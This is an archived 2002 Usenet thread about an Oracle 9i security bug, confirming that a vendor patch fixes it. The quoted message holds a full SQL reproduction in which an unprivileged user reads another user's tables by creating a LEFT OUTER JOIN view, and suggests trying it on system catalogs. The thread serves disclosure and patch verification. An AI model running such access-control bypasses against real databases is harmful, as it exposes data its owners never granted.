Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?

Re: 9iDB Security Hole?

From: Connor McDonald <connor_mcdonald_at_yahoo.com>
Date: Thu, 18 Apr 2002 21:58:22 +0100
Message-ID: <3CBF336E.280B@yahoo.com> 





Vladimir M. Zakharychev wrote:


> 

> one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris

> yesterday. Anyone with 9.0.1.3/Sol can install it and verify that it closes the

> hole altogether?

> 

> --

> Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com

> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.

> All opinions are mine and do not necessarily go in line with those of my employer.

> 

> "Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...

> > Anyone with 9i can confirm this?

> >

> > From: news [mailto:news_at_host.talk.ru] On Behalf Of ...

> > ...relcom.comp.dbms.oracle

> >

> >

> > connect  system/****@database

> > CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY

> > TABLESPACE temp;

> > CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY

> > TABLESPACE temp;

> > Grant Create  Session To us1;

> > Grant Create  Session To us2;

> > Grant Create Table To us1;

> > grant unlimited tablespace to us1;

> > Grant Create View To us2;

> >

> > Connect us1/us11_at_database;

> > Create Table t1(c1 Number(1));

> > Insert Into t1(c1) Values(9);

> > Create Table t2(c1 Number(1));

> > Insert Into t2(c1) Values(9);

> >

> > commit;

> > Connect us2/us11_at_database;

> >

> > SQL> Select * From us1.t1;

> > ORA-00942: table or view does not exist

> > -- this is expected

> > SQL> Select * From us1.t2;

> > ORA-00942: table or view does not exist

> > -- this one too

> > SQL> Create View aa As Select * From us1.t1;

> > ORA-00942: table or view does not exist

> > -- and this one

> > SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1

> > >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;

> >

> > View created

> > -- now this one is NOT !!!!!

> > SQL> select * from aa;

> >

> > T1_C1 T2_C1

> > ---- ----

> >    9    9

> >

> >

> > This effectively means that LEFT OUTER JOIN allows to create views

> > on tables that are normally not visible (provided that unprivileged user

> > knows table and column names).

> > If you can confirm this basic example, can you also try it on system

> > catalog tables/views? If you can not confirm, please specify your version

> > and platform so that we know which ones are not affected (poster didn't

> > specify version, but I suggest it's 9.0.1.1 on either NT or Linux).

> >

> > --

> > Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com

> > Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.

> > All opinions are mine and do not necessarily go in line with those of my employer.

> >

> >

> >




Yes - plopped onto a machine today and it works fine



Cheers


Connor

-- 
==============================
Connor McDonald

http://www.oracledba.co.uk

"Some days you're the pigeon, some days you're the statue..."


Received on Thu Apr 18 2002 - 15:58:22 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US